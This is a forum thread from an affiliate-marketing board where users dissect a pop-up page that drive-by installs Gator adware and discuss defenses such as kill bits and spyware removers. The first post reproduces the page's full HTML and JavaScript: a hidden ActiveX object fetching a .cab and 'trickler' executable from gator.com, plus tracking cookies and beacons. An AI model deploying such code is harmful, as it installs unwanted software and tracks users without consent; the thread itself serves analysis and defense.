  1. #1
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    When I was surfing today I came to a website where a lot of pop-ups appeared. When I had finished clicking them away (in my Opera browser), an invisible web page remained that I could neither see nor access. So I saved it to my desktop and viewed the source code with the edit feature. The code was:


    .<html>
    <head>
    <title></title>
    .<script language="JavaScript">
    // Flag read by checkPlugin(). The only place on this page that sets it to
    // true is the script block bound to the IEGator object's onPluginCreated event.
    var pdppi_loaded = false;

    /**
     * Would point the "partnerEventPixel" image at a partner tracking URL.
     * In this captured copy event_src is the empty string, so the branch never
     * runs and no request is made. Presumably the server fills the URL in for
     * some partners; that is not visible here.
     */
    function sendPartnerEvent( ){
    var event_src = "";
    if( event_src ){
    document.partnerEventPixel.src = event_src;
    }
    }

    /**
     * Would request a partner "impression" URL through a throw-away Image object
     * (assigning .src is what triggers the HTTP request).
     * As captured, event_src is empty, so nothing is sent.
     */
    function sendPartnerImp(){
    var event_src = "";
    if( event_src ){
    var eventImg = new Image;
    eventImg.src = event_src;
    }
    }

    /**
     * Reports an event to the server by re-pointing one of the 1x1 images in the
     * page body at a tracking URL (a "web beacon": the image request carries the
     * data in its path and query string).
     *
     * The URL is site-relative and embeds the same identifier that checkPlugin()
     * stores in the GatorWebPdpCookie_WUID cookie, plus a partner code (yic) and
     * the event id, so every event is tied to that per-visitor id.
     *
     * @param eventid  numeric event code sent as the eventid query parameter;
     *                 the page uses 4001, 4011 and 4012 (meanings not shown here).
     * @param eventnum appended to the .gif file name and used to pick the image:
     *                 2 -> eventPixel2, anything else -> eventPixel1.
     */
    function changeEventPixelSrc( eventid, eventnum ){
    var event_src = "/uniq3/PwVE1sCo-sIAAEswczg" + eventnum + ".gif?yic=HIC_FortuneCity7&eventid=" + eventid + "&reason=0&wuid=PwVE1sCo-sIAAEswczg&ver=0";
    switch( eventnum ){
    case 2:
    document.eventPixel2.src = event_src;
    break;
    default:
    document.eventPixel1.src = event_src;
    }
    }

    /**
     * Opens an empty 300x300 window named 'ncr', centred on the screen.
     * Nothing in the captured page calls this function.
     */
    function openNew( ){
    // Centre a 300x300 box: half the screen size minus half the window size.
    var pos_top = (screen.height/2)-(300/2);
    var pos_left = (screen.width/2)-(300/2);
    window.open( '','ncr','width=300,height=300,top=' + pos_top + ',left=' + pos_left );
    }

    /**
     * Schedules this window to close itself after `wait` seconds.
     * checkPlugin() calls it with 30 on the branch where the plugin check failed.
     *
     * @param wait delay in seconds (multiplied by 1000 for setTimeout).
     * @returns always true.
     */
    function sleep_close( wait ){
    var jsTimer = wait * 1000;
    // String form of setTimeout: the text is evaluated as code when the timer fires.
    setTimeout("window.close();",jsTimer);
    return true;
    }

    /**
     * Runs from the body's onLoad handler. Checks whether the IEGator object
     * written by embedPlugin() is present, sets the tracking cookies, and reports
     * the outcome through a beacon.
     *
     * js_plugin_error encodes what typeof( IEGator ) returned:
     *   0 - object present and IEGator.params is a string
     *   1 - object present but params is not a string
     *   2 - 'undefined' (no such object in the page)
     *   4 - 'unknown' (a typeof result old Internet Explorer gives for some
     *       host/COM objects)
     *   8 - any other type
     *
     * Note for anyone reading cookie stores: the four setCookie() calls below run
     * unconditionally, before the result is looked at. Finding those
     * GatorWebPdpCookie_* cookies therefore shows that this page was loaded and
     * its script ran, not that the control was installed.
     */
    function checkPlugin( ){
    var js_plugin_error = 0;
    var strObjType = typeof( IEGator );
    if( 'object' == strObjType ){
    var strParamsType = typeof( IEGator.params );
    if ( strParamsType != 'string' ){
    js_plugin_error += 1;
    }
    } else {
    if('undefined' == strObjType){
    js_plugin_error += 2;
    }
    else if( 'unknown' == strObjType ){
    js_plugin_error += 4;
    } else {
    js_plugin_error += 8;
    }
    }

    // Set regardless of the check above. WUID is the same identifier that is
    // embedded in the beacon URLs and in the plugin's params string; it and
    // PluginTimer get a 3650-day lifetime, the other two 30 days.
    setCookie( "GatorWebPdpCookie_OfferedApps", ":1", 30 );
    setCookie( "GatorWebPdpCookie_WUID", "PwVE1sCo-sIAAEswczg", 3650 );
    setCookie( "GatorWebPdpCookie_PluginTimer", 1057311710, 3650 );
    setCookie( "GatorWebPdpCookie_VisitedPartners", "hic_fortunecity7:1", 30 );
    doHBPix();

    // Success path: the object looks usable, or the onPluginCreated handler fired.
    if( js_plugin_error == 0 || pdppi_loaded ){
    window.focus();
    setCookie( "GatorWebPdpCookie_ApprovedApps", "", 3650 );
    // Event 4011 is sent only on this branch, 4012 only on the other;
    // presumably "plugin loaded" / "plugin not loaded" - not confirmed by the page.
    changeEventPixelSrc( 4011, 2 );
    sendPartnerEvent( );
    } else {
    changeEventPixelSrc( 4012, 2 );

    // Failure path: the window closes itself after 30 seconds.
    sleep_close( 30 );
    }
    sendPartnerImp();


    }

    /**
     * Writes a persistent cookie scoped to every host under gator.com.
     *
     * @param name  cookie name.
     * @param value cookie value; passed through escape() before being stored.
     * @param days  lifetime in days from now (checkPlugin() passes 30 or 3650).
     */
    function setCookie( name, value, days ){
    // days -> milliseconds
    var expiry = 1000 * 60 * 60 * 24 * days;
    var expDate = new Date();
    expDate.setTime(expDate.getTime() + expiry);
    // path=/ and domain=.gator.com make the cookie visible to all paths on all
    // gator.com subdomains. escape() and toGMTString() are legacy APIs.
    document.cookie = name + "=" + escape( value ) + "; expires=" + expDate.toGMTString() + "; path=/; domain=.gator.com";
    }

    /**
     * Would point the "hbpix" image at another beacon URL.
     * newHBpix is empty in this captured copy, so no request is made.
     *
     * @returns always true.
     */
    function doHBPix(){
    var newHBpix = "";
    if( newHBpix ){
    document.hbpix.src = newHBpix;
    }
    return true;
    }

    /**
     * Writes an ActiveX <object> element into the page while it is being parsed.
     * This is the part of the page that asks the browser to load the control;
     * everything else is tracking and bookkeeping.
     *
     * What the markup contains:
     *   - id "IEGator": the name checkPlugin() tests with typeof.
     *   - classid: the control's CLSID. This is the stable identifier a defender
     *     can search a host for or block (for example with an ActiveX kill bit).
     *   - codebase: a .cab on webpdp.gator.com. In Internet Explorer, codebase is
     *     where the browser fetches the control from when the CLSID is not
     *     already registered on the machine.
     *   - width/height 2: the object is effectively invisible on the page.
     *   - params: a query-style string handed to the control. It names a second
     *     file on the same host (trickler_4010.ex_), the partner code, the same
     *     wuid used in the cookies and beacons, and a EULA URL. How the control
     *     uses these values is not visible from this page.
     *   - the <img> is fallback content shown when the object cannot be created.
     */
    function embedPlugin( ){
    document.writeln( "<object" );
    document.writeln( " id=\"IEGator\"" );
    document.writeln( " classid=\"CLSID:54e7e082-1da6-412e-96b5-c290fcef5329\"" );
    document.writeln( " codebase=\"http://webpdp.gator.com/v3/download/iegator_4090_hd3ptdmgainads.cab\"" );
    document.writeln( " align=\"baseline\"" );
    document.writeln( " border=\"0\"" );
    document.writeln( " width=\"2\"" );
    document.writeln( " height=\"2\">" );
    document.writeln( " <param name=\"params\" value=\"&fcn=hd&bgcolor=FFFFFF&ds=1&tkds=1&src=webpdp.gator.com/v3/download/trickler_4010.ex_&aic=HIC_FortuneCity7&pidel=this&email=&fname=&country=&zip=&wuid=PwVE1sCo-sIAAEswczg&rs=1&hdeulaurl=http://www.gatorcorporation.com/help/hd_postyes40/hd-post-yes40-p1f.html&did=0&apprq=\">" );
    document.writeln( " <img src=\"images/pixel.gif\" width=\"2\" height=\"2\" alt=\"[Plugin]\">" );
    document.writeln( "</object>" );
    }

    .</script>
    .<script language="JavaScript" for="IEGator" event="onPluginCreated()">
    // Body of an Internet Explorer for/event script: it runs when the IEGator
    // object raises onPluginCreated. Setting the flag makes checkPlugin() take
    // its success branch even if the typeof test on IEGator failed.
    pdppi_loaded = true;
    // Return value handed back to the control; its meaning is not shown on this page.
    return 7;
    .</script>
    .</head>
    .<body bgcolor="#FFFFFF" onLoad="checkPlugin();" onUnload="">
    .<center>.<font>Please Wait ....</font>.</center>
    .<img src="images/pixel.gif" name="eventPixel1" height="1" width="1" alt="[pixel1]">
    .<img src="images/pixel.gif" name="eventPixel2" height="1" width="1" alt="[pixel2]">
    .<img src="images/pixel.gif" name="partnerEventPixel" height="1" width="1" alt="[pixel3]">
    .<img src="images/pixel.gif" name="hbpix" height="1" width="1" alt="[pixel4]">
    .<script language="JavaScript1.2">
    // Runs while the body is being parsed, i.e. before the onLoad call to
    // checkPlugin(): first a beacon with event id 4001 through eventPixel1,
    // then the <object> element for the control is written into the page.
    changeEventPixelSrc( 4001, 1 );
    embedPlugin();
    .</script>
    .</body>
    .</html>



    It tried to download a " precision and Date Manager, free 10 second Gain ad-supported that displays exact time and date and Gain-branded ads selected based on websites you view"


    does that mean that they steal me 10 seconds and, of course my cookie?


    carneol

  2. #2
    ABW Ambassador Andy's Avatar
    Join Date
    January 18th, 2005
    Posts
    4,178
    Welcome to the wonderful world of parasitic activity.

    You probably didn't realize it, but you wanted to download it, right? I mean, they would never try to take advantage of an unsuspecting computer user...

    I'm not an expert by any means, and I'm sure someone here can give you all the details you need, but that's how some of those software apps get downloaded, and it looks like yours may have been one of them. No request for permission, no chance to read the TOS.

    Of course, everyone WANTS them because they offer such value to the end user...

    It ought to be illegal!

    Andy

    P.S., Any positive comments made in this post were meant to be sarcastic.

    _______________
    "If you were born to be shot, you'll never be hung." -Unknown

  3. #3
    Defender of Truth, Justice and the Affiliate Way
    Join Date
    January 18th, 2005
    Location
    The Swamp
    Posts
    7,503
    Looks like a download for the gator trickler program. The trickler, once downloaded, will download the full gator software over time. And yes, this is a drive by download.

    It's Your Money. You earned it. What are you going to do to make sure you get to keep it?

  4. #4
    Super Sh!t Stirrer SSanf's Avatar
    Join Date
    January 18th, 2005
    Posts
    9,944
    What the heck! I just searched for "gator" on my computer and I found a cookie that says this
    <BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR> GatorWebPdpCookie_WUID
    Pvh6pgr3CA8AAHbdPqU
    gator.com/
    0
    1830886912
    30305953
    3048811392
    29571698
    *
    GatorWebPdpCookie_MSG
    86%3A3%3A1%3A3ef87aa6%7C87%3A3%3A1%3A3ef884b7
    gator.com/
    0
    2897548672
    29583768
    1999211392
    29571698
    *
    GatorWebPdpCookie_PLCMNT
    78%3A44%3A2%3A3ef884b7
    gator.com/
    0
    2897548672
    29583768
    1999211392
    29571698
    *
    GatorWebPdpCookie_OfferedApps
    %3A2
    gator.com/
    0
    2915180032
    29577733
    3048811392
    29571698
    *
    GatorWebPdpCookie_PluginTimer
    1056476193
    gator.com/
    0
    1830886912
    30305953
    3048811392
    29571698
    *
    GatorWebPdpCookie_VisitedPartners
    hic_fortunecityus%3A1%7Chic_fortunecity10%3A1
    gator.com/
    0
    2915180032
    29577733
    3048811392
    29571698
    *
    <HR></BLOCKQUOTE>

    I have never downloaded Gator. Do I have it on my computer, now?

    The Wolf Credo: Respect the elders. Teach the young. Cooperate with the pack. Play when you can. Hunt when you must. Rest in between. Share your affections. Voice your feelings. Leave your mark.

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    Ssanf, seems that you have a drive by download on your PC, and also the plugin timer I found above. What scares me is that:"

    free 10 second Gain".

    What does that mean? Do they change the PC clock for 10 sec. and therefore my cookie which is set is 10 sec. older than theirs?


    carneol

  6. #6
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Once Gator or any BHO gets their backdoor installed and complete access to your PC they can turn loose their commission tapeworm. Gator has about 600 participating merchants. Cookie overwrite time or planting theirs with a 10 second head start. What the networks are hiding is the growth of these BHOs, as they sure know the BHO syndication players.

    Next up gator installs a new batch of 600 active cookies daily on all their 30 million captives. Many not even knowing Gator is there. Wanna bet Gator is working on cutting into the other BHO's revenue scheme. The battle of the theftware Bots is underway leaving behind normal value add affiliates and carcasses of PCs that just don't work anymore.

    At least they all have screwed over their merchants plans at branding and free traffic.....ROLMAO

    Mike & Charlie ...

    If they won't adopt and feed a bird ..flip them one! BBQ some Gator and remember to flush WhenU..

  7. #7
    ABW Ambassador
    Join Date
    January 18th, 2005
    Location
    Sacramento, CA
    Posts
    1,263
    now, the question is, what can we do with the information posted above, be it notifying the visitor that they have it installed, or actually reversing the process? Would parasite.js catch this?

    FreeCallz.com

  8. #8
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I asked what to do in a special javascript webdeveloper forum and got the answer:

    For IE:
    Tools
    Internet Options...
    Security
    Custom Level...
    Then set to "Prompt" anything that you don't want done automatically.


    Clientside javascripts work on 95% of all visitors.



    carneol

  9. #9
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    668
    This happened to me a week or so ago, but with Ncase, it was hell getting all the crap off my puter and everything back to normal again!

    It started with the drive by download of Ncase - which in order to uninstall you have to go to their site and download the uninstaller, then within 24 hours I had kazaa/whenu/gator all kinds of crap and a zillion popups, and alot of them xxx rated crap, it was a major PITA!!

    It's more fun to jump on the trampoline than sit underneath it!

  10. #10
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I got another reply from that js forum:


    "You could get a free program called SpywareBlaster. I think it's from .http://wilderssecurity.com/ .
    It sets what is known as a 'kill-bit' for all known spyware, preventing it from running. In this case, I think the website was trying to download Gator to your computer. With the Gator kill-bit set, it wouldn't install. If it's already installed before you set up SpywareBlaster, then it couldn't run after you set the kill-bit.
    WildersSecurity also has several other free programs that are great for increasing the security of your computer."


    Don't know what it is. Has anybody experience with that "killerbit"?


    carneol



    P.S.: I found that Information and it looks very good:


    "SpywareBlaster:

    SpywareBlaster doesn't scan and clean for spyware - it prevents it from ever being installed.
    By setting a "kill bit" for spyware ActiveX controls, SpywareBlaster can prevent the installation of any spyware ActiveX controls from a webpage. It does this while not interfering with "friendly" ActiveX controls - so your browser can work correctly and you can have peace of mind!
    You won't get any more annoying "Yes/No" boxes popped up, asking you to install a spyware ActiveX control (which can increasingly be found in pop-up ads!). In fact, Internet Explorer will never even download or run the spyware ActiveX control!
    In addition, SpywareBlaster can prevent many of these spyware ActiveX controls from running, even if they are already installed on your system.*
    The newest SpywareBlaster version can even block spyware/tracking cookies!
    And SpywareBlaster does not need to be running in the background to provide this protection!
    The SpywareBlaster database contains information on these known spyware Active-X controls. Make sure you run the Check For Updates feature frequently to get the latest database! (And make sure you check the new items to protect your system against them!)
    SpywareBlaster also provides the exclusive System Snapshot! - Take a snapshot of your computer in its clean state, and use System Snapshot later to revert many changes made by spyware and browser hijackers!"

    [This message was edited by carneol on July 05, 2003 at 05:51 PM.]

  11. #11
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    4,423
    SSanf, now that you have that stuff on your pc - don't you feel empowered?

    Chet

  12. #12
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    I can not recommend spywareblaster, because it blocks all cookies and rates everything as spyware which comes from the web.


    carneol

  13. #13
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,082
    <BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR> For IE:
    Tools
    Internet Options...
    Security
    Custom Level...
    Then set to "Prompt" anything that you don't want done automatically.
    <HR></BLOCKQUOTE>
    Which ones should we set to prompt? I set them all to prompt and it is getting annoying. Any suggestions are welcome.
    Cazzie

    Join the Fight! Parasite Free In 2003!

  14. #14
    Full Member
    Join Date
    January 18th, 2005
    Posts
    379
    spybot and ad-aware have become a regular routine for me for the past 6 months.

    In case you haven't heard of these, they remove scumware from the PC. It's amazing what gets picked up while surfing.

  15. #15
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    1,403
    If you are a customer and you run a bot, then the cookies from e.g. cj.com are deleted, and the publisher that set the cookie doesn't get commission when you sell something from this merchant.


    carneol
